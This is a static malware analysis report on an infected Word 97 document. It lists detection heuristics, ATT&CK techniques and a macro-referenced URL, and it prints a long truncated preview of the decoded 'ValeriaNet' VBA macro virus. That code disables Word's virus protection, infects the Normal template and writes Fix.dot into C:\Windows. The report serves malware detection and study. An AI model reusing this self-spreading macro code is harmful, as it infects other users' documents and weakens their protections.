Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 08e16fcc9d8d6f64…

MALICIOUS

Office (OLE)

107.5 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: d7f0daf9126e37146d936a864b5d6cf7 SHA-1: cfe71d9e5261d60617404c283ee40f7177a9a133 SHA-256: 08e16fcc9d8d6f643cee2f747a1da5c6f3f5c2bb877195b84fa6a2d5530da14e
422 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, which are commonly used for malicious purposes. Critical heuristics indicate the use of obfuscated Shell() calls containing a URL, suggesting the macro's intent is to download and execute a second-stage payload from the embedded URL http://hacking.error.sg.net. The ClamAV detections further confirm the malicious nature of the file.

Heuristics 9

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://hacking.error.sg.net Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 37060 bytes
SHA-256: e8866fb2791ff10779df30522ee5dacdbc2313734b1b6682e8da8d5f8b7fe287
Detection
ClamAV: Doc.Trojan.VMPCK1-9
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ValeriaNet"
Public AD As Object, NT As Object
Sub AutoOpen()
    On Error GoTo hapus
Dim NT As Object
Dockenor
Create_Loader
Norkedoc
Application.EnableCancelKey = wdCancelDisabled
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
    If NormalTemplate.VBProject.VBComponents.Item(1).Name = "Valerianet" Then NormInstall = True
Next i
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
    If ActiveDocument.VBProject.VBComponents.Item(1).Name = "Valerianet" Then ActivInstall = True
Next i
If ActivInstall = True And NormInstall = True Then GoTo Label_Exit
If ActivInstall = True And NormInstall = False Then Set Doc = ActiveDocument
If ActivInstall = False And NormInstall = True Then Set Doc = NormalTemplate
Pad = Options.DefaultFilePath(wdDocumentsPath)
ModuleLength = Doc.VBProject.VBComponents("Valerianet").CodeModule.CountOfLines
NT.Save
Doc.VBProject.VBComponents("valerianet").Export Pad + ("\Fix.txt")
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
ValeriaNet
Label_Exit:
CommandBars("Tools").Controls("Templates and Add-Ins...").Delete
'CommandBars("Format").Controls("Style...").Delete
If NormInstall = True Then Call Create_Loader
Application.ScreenUpdating = True
Application.DisplayAlerts = wdAlertsAll
Application.EnableCancelKey = wdCancelInterrupt
hapus:
Dockenor
End Sub
Sub Create_Loader()
On Error Resume Next
Options.DefaultFilePath(wdStartupPath) = "C:\Windows"
Options.DefaultFilePath(wdTempFilePath) = "C:\Windows\inf"
Pad1 = Options.DefaultFilePath(wdStartupPath)
MyFile = Dir(Pad1 + "\Fix.dot")
If MyFile = "" Then
Set aDoc = NormalTemplate.OpenAsDocument
With aDoc
    .SaveAs FileName:=Pad1 + "\Fix.dot"
    .Close SaveChanges:=wdDoNotSaveChanges
End With
End If
End Sub
Sub ValeriaNet()
On Error Resume Next
Dockenor
Norkedoc
Call sim
Call Create_Loader
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
ActiveDocument.ReadOnlyRecommended = False
If Month(Now()) = 1 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 2 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 3 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 4 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 5 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 6 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 7 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 8 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 9 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 10 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 11 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 12 And Day(Now()) = 26 Then Call ultah
With Dialogs(wdDialogFileSummaryInfo)
    .Author = "ValeriaNet Security System"
    .Title = "Word 97/2000 Valerianet "
    .Subject = "..WHO AM I..???"
    .Comments = "(c) Copyright 1999 AlrightReserved"
    .Execute
End With
bodo:
End Sub
Sub FileSave()
    On Error Resume Next
    Norkedoc
    Dockenor
    ActiveDocument.Save
    ValeriaNet
End Sub
Sub FileClose()
    On Error Resume Next
    Norkedoc
    Dockenor
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    ValeriaNet
ActiveDocument.Close
End Sub
Sub FileSaveAs()
    On Error Resume Next
    Norkedoc
    Dockenor
    ValeriaNet
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub FileExit()
    On Error Resume Next
    Norkedoc
    Dockenor
    ValeriaNet
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    Application.Quit
End Sub
Sub AutoExit()
    On Error Resume Next
    Norkedoc
    'Dockenor
    ValeriaNet
End Sub
Sub AutoExec()
On Error GoTo hapus
Nor
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.